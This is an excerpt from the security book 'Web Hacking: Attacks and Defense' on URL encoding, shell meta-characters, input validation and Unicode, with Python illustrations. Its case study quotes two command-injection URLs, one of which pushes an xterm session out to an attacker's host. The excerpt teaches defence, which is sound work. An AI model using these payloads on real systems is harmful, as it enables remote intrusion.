URL Encoding

By themselves, URLs are nothing but alphanumeric strings, with some other symbols thrown in. The character set chosen to express a URL string consists of the following symbols:

Symbols                     Values
Alphanumeric symbols        A-Z, a-z, 0-9
Reserved symbols            ; / ? : @ & = + $ , < > # % "
Other special characters    - _ . ! ~ * ' ( ) { } | \ ^ [ ] `

For the most part, a URL string consists of letters, numbers, and reserved symbols that have special meaning within the URL string. Other special characters are found in some URL strings, although they don't have any special meaning as far as the URL is concerned. However, they may have special meaning for the Web server receiving the URL or the application that is requested via the Web server.

Interpretations of some of these special characters are presented in Table 5-2.

Meta-Characters

Characters such as * and ; and | and ` have special meanings as meta-characters in applications and scripts. These characters don't affect the URL in any way, but if they end up making their way into applications, they may change the meaning of the input altogether and sometimes create gaping security holes.

Table 5-2. Special Characters and Their Meaning Within a URL

Special Character    Interpretation
?    Query String separator. The part of the URL string to the right of the ? symbol is the Query String.
&    Parameter delimiter. Used to separate name=value parameter pairs on the Query String.
=    Separates the parameter name from the parameter value when passing parameters on the Query String.
+    Is translated into a space.
:    Protocol separator. The portion of the URL string from the beginning to the : symbol specifies the application layer protocol to be used when requesting the resource.
#    Used to specify an anchor point within a Web page. For example, the URLs http://www.acme-art.com/index.html#gallery and http://www.acme-art.com/index.html#purchase take you to two different locations within the same page, index.html.
%    Used as an escape character for specifying hexadecimal encoded characters.
@    Used in mailto: URLs when specifying Internet e-mail addresses, or when passing user login credentials to a password-protected resource, especially over FTP.
~    Used for specifying a user's home directory on a multiuser system such as Unix. The URL looks like http://server/~user_login_id/. For example, http://www.cs.purdue.edu/~saumil/ maps to the Web page subdirectory within user saumil's account on the system.
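As a rough illustration of the separators in Table 5-2, the sketch below uses Python's standard urllib.parse module to split a URL at the :, ?, &, =, + and # characters. The host and anchor come from the table; the query string (artist and title) is a made-up example, not something taken from the Acme Art site.

```python
from urllib.parse import urlsplit, parse_qsl

# Host and fragment come from Table 5-2; the query string is hypothetical.
url = "http://www.acme-art.com/index.html?artist=monet&title=water+lilies#gallery"

parts = urlsplit(url)
print(parts.scheme)    # text before the ':' protocol separator
print(parts.path)      # resource path on the server
print(parts.query)     # text between '?' and '#'
print(parts.fragment)  # anchor point after '#'

# '&' separates the pairs, '=' separates name from value,
# and '+' is translated into a space.
params = parse_qsl(parts.query)
print(params)
```

Note that the fragment is handled by the browser and is normally not sent to the Web server at all.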

Many meta-characters are interpreted differently by different Web servers. Table 5-3 describes how various meta-characters are interpreted inside applications.

Specifying Special Characters on the URL String

The question that arises now is, "What if we want to specify special characters such as % or ? or & or + without giving them any special meaning?" For example, suppose we want to pass two parameters, book=pride&prejudice and shipping=snailmail, on the Query String. In this case, the URL is:

http://mycheapbookshop.com/purchase.cgi?book=pride&prejudice&shipping=snailmail

Table 5-3. Meta-Characters and Their Meanings

Meta-Character    Interpretation/Use
*    The star character is used as a wild card or a file globbing character. In Unix shell scripts, the asterisk character expands to the list of filenames present in the current directory.
;    The semicolon character has many meanings in many different contexts. The most common use of a semicolon is to terminate lines of source code in languages such as C or Perl. In other contexts, the semicolon is also used as a command separator, as in Bourne shell scripts and SQL queries.
|    The pipe character, if sneaked through without proper checking, can play havoc. It is one of the most powerful characters in Unix shell scripts, second only to the grave accent character `. The pipe joins two commands by redirecting the standard output of the first command to the standard input of the second command. In Perl scripts, if a pipe character is used as a suffix or prefix to the filename when it is opened, the filename is treated as a system command and is executed by the OS shell. The file handle then receives the output generated by the program that is executed.
`    The grave accent character (commonly called a back-tick or a back-quote) is used for command output substitution and is the most powerful character in Unix shell scripting. If a Unix shell command is bounded by grave accents, the output of the command is substituted for it and returned to the receiving variable to which the assignment is made. For example, files=`ls -la` causes the shell variable "files" to be set to the output of the command ls -la.
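One way to see how these meta-characters can be neutralized before a value reaches a Unix shell is Python's standard shlex.quote function, which wraps any string containing shell meta-characters in single quotes. This is only a sketch: the sample values are hypothetical, and passing arguments as a list without invoking a shell at all is usually the safer design.

```python
import shlex

# Hypothetical user-supplied values containing the meta-characters above.
samples = ["report.txt", "*", "a; id", "x | which xterm", "`ls -la`"]

for value in samples:
    # Values made only of safe characters pass through unchanged;
    # anything else is wrapped in single quotes so the shell treats it as data.
    print(f"{value!r:22} -> {shlex.quote(value)}")
```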

 

Meta-Characters and Input Validation

Lack of proper input validation is the single most prominent cause of Web application vulnerabilities, accounting for over 90% of them. The concept of input validation isn't new. During our days of writing Fortran code in college, the instructor used to perform manual input validation before giving us credit for the code submitted. One of the programs to be written calculated the natural logarithm of a number. None of the students' code ever made it past the first input given by the instructor, "banana", when the program was expecting a number! Given unexpected input, the program would crash and dump core. In those days, we little realized the importance of proper input validation. Making an xterm pop out by forcing meta-characters and Unix commands into a Web page form is perhaps the epitome of elegant Web hacks, and it is attributable entirely to weak input validation.
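A minimal sketch of input validation, assuming a hypothetical page parameter whose legitimate values are simple file names such as index.html. Rather than trying to list every dangerous meta-character, it accepts only values that match a narrow pattern and rejects everything else. The pattern and function name are illustrative assumptions.

```python
import re

# Assumption: legitimate page names look like "index.html" and nothing else.
PAGE_PATTERN = re.compile(r"[A-Za-z0-9_-]+\.html")

def is_valid_page(value: str) -> bool:
    """Return True only if the entire value matches the allowlist pattern."""
    return PAGE_PATTERN.fullmatch(value) is not None

print(is_valid_page("index.html"))        # plain file name
print(is_valid_page("|ls -la /|"))        # pipe meta-characters
print(is_valid_page("../../etc/passwd"))  # path traversal attempt
```

Using fullmatch rather than search matters here: the whole value has to fit the pattern, so a valid-looking prefix followed by meta-characters is still rejected.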

This URL is ambiguous because its Query String contains two & symbols. Most likely, a Web server would split such a Query String into three parameters instead of two, namely book=pride, prejudice=, and shipping=snailmail.
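The split can be reproduced with Python's standard urllib.parse.parse_qsl, used here as a stand-in for whatever parser a given Web server applies. Other servers may treat the valueless name differently.

```python
from urllib.parse import parse_qsl

query = "book=pride&prejudice&shipping=snailmail"

# keep_blank_values=True keeps names that arrive without a value,
# so the stray "prejudice" shows up as a third parameter.
params = parse_qsl(query, keep_blank_values=True)
for name, value in params:
    print(f"{name} = {value!r}")
```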

If we want to pass the & symbol as part of the parameter value, the URL specification allows us to express reserved and special characters in a two-digit hexadecimal encoded ASCII format, prefixed with a % symbol, as follows:

Characters                      Hex Values
All hex encoded characters      %XX (%00-%FF)
Control characters              %00-%1F, %7F
Upper 8-bit ASCII characters    %80-%FF
Space                           %20 or +
Carriage return                 %0d
Line feed                       %0a

In the preceding example, the ASCII value of the & symbol is 38 in decimal and 26 in hexadecimal. Therefore, if we want to express the & symbol, we can use %26 in its place. The URL in the example would become:

http://mycheapbookshop.com/purchase.cgi?book=pride%26prejudice&shipping=snailmail
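The same arithmetic and encoding can be checked with Python's standard urllib.parse module. This is only an illustration of the %XX scheme; the variable names are arbitrary.

```python
from urllib.parse import quote, quote_plus, unquote, urlencode

# ASCII value of '&' in decimal and in two-digit hexadecimal.
print(ord("&"), format(ord("&"), "02X"))

# Encode a single parameter value; safe="" leaves no reserved character unescaped.
value = quote("pride&prejudice", safe="")
print(value)

# Build the whole Query String from name/value pairs.
query = urlencode({"book": "pride&prejudice", "shipping": "snailmail"})
print("http://mycheapbookshop.com/purchase.cgi?" + query)

# Decoding restores the original value.
print(unquote(value))

# A space can be written as %20 or as +.
print(quote("snail mail"), quote_plus("snail mail"))
```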

Unicode Encoding

Hexadecimal ASCII encoding, while adequate for most purposes, isn't broad enough to represent character sets larger than 256 symbols. Most modern operating systems and applications support multibyte representations of character sets of languages other than English. Microsoft's IIS Web server supports URLs containing characters encoded with the multibyte UCS Transformation Format (UTF-8), in addition to hexadecimal ASCII encoding.
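To make the multibyte case concrete, the sketch below percent-encodes two non-ASCII strings with Python's urllib.parse.quote, which uses UTF-8 by default. Each character outside the ASCII range becomes two or three %XX bytes. The sample strings are arbitrary.

```python
from urllib.parse import quote, unquote

for text in ["café", "日"]:
    encoded = quote(text)  # UTF-8 bytes, each written as %XX
    print(text, "->", encoded, f"({len(text.encode('utf-8'))} bytes)")
    # Decoding the %XX bytes as UTF-8 restores the original text.
    assert unquote(encoded) == text
```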

The Acme Art, Inc., Hack

Let's take a look at two URLs launched by the attacker on www.acme-art.com, presented in the Part One Case Study. The URLs are:

http://www.acme-art.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|

http://www.acme-art.com/index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26|

The hacker used meta-characters and URL encoding carefully. The parameter being passed by page= ends up being used as a filename in the open() function in index.cgi's Perl code. The attacker placed pipe characters around the commands to cause Perl to run them and return the output. The first URL has three Unix commands separated by the linefeed character %0A. Each encoded linefeed acts like pressing the Enter key between commands, so the three commands ran in succession. The second URL throws an xterm back to the attacker's system. Note how the attacker sneaked in the ampersand character as %26, causing the xterm process to be spawned as a background process.
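Decoding the first URL shows what the page parameter looks like once the + and %0a sequences have been translated. The sketch uses Python's urllib.parse as a stand-in for the server-side decoding; it only inspects the string and runs nothing.

```python
from urllib.parse import urlsplit, parse_qs, unquote_plus

url = "http://www.acme-art.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|"

# parse_qs turns '+' into a space and %0a into a linefeed.
page = parse_qs(urlsplit(url).query)["page"][0]
print(repr(page))

# Strip the surrounding pipes and split on the decoded linefeeds
# to list the individual commands.
commands = page.strip("|").split("\n")
print(commands)

# %26 decodes to '&', the shell's run-in-background operator.
print(unquote_plus("%26"))
```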

The Universal Character Set (UCS) is defined by the International Organization for Standardization's draft ISO 10646. Although UCS is maintained by ISO, a separate group was formed (primarily by software vendors) to allow representation of a variety of character sets with one unified scheme. This group came to be known as the Unicode Consortium (http://www.unicode.org). As standards were developed, both Unicode and UCS decided to adopt a common representation scheme so that the computing world didn't have to deal with separate standards for the same thing. UTF-8 encoding is defined in ISO 10646-1:2000 and in RFC 2279. For operating systems that have been designed around the ASCII character encoding scheme, UTF-8 allows for easy conversion and representation of multibyte Unicode characters using ASCII mappings.

Without going into the intricacies of how UTF-8 works, let's look at Unicode encoding from a URL's point of view. Two-byte Unicode characters are encoded by using %uXXYY, where XX and YY are hexadecimal values of the higher and lower byte respectively. For the standard ASCII characters %00 to %FF, the Unicode representation is %u0000 to %u00FF. The Web server decodes 16 bits at a time when dealing with Unicode encoded symbols.
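The %uXXYY form can be decoded with a few lines of code. Python's urllib.parse does not decode this form, so the sketch below uses a small regular expression instead. The function name is hypothetical, and the sketch handles only single 16-bit values, as described above.

```python
import re

def decode_percent_u(text: str) -> str:
    """Replace each %uXXYY sequence with the 16-bit character it names."""
    return re.sub(
        r"%u([0-9A-Fa-f]{4})",
        lambda m: chr(int(m.group(1), 16)),
        text,
    )

# Standard ASCII characters map to %u0000 through %u00FF.
print(decode_percent_u("%u0041%u0042%u0043"))
# A slash written in the two-byte form.
print(decode_percent_u("/scripts%u002Fhello"))
```

An input filter that checks only for the %XX form of a character would miss its %uXXYY equivalent, which is why both forms need to be decoded before validation.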

 



Web Hacking: Attacks and Defense
ISBN: 0201761769
Year: 2005
Pages: 156
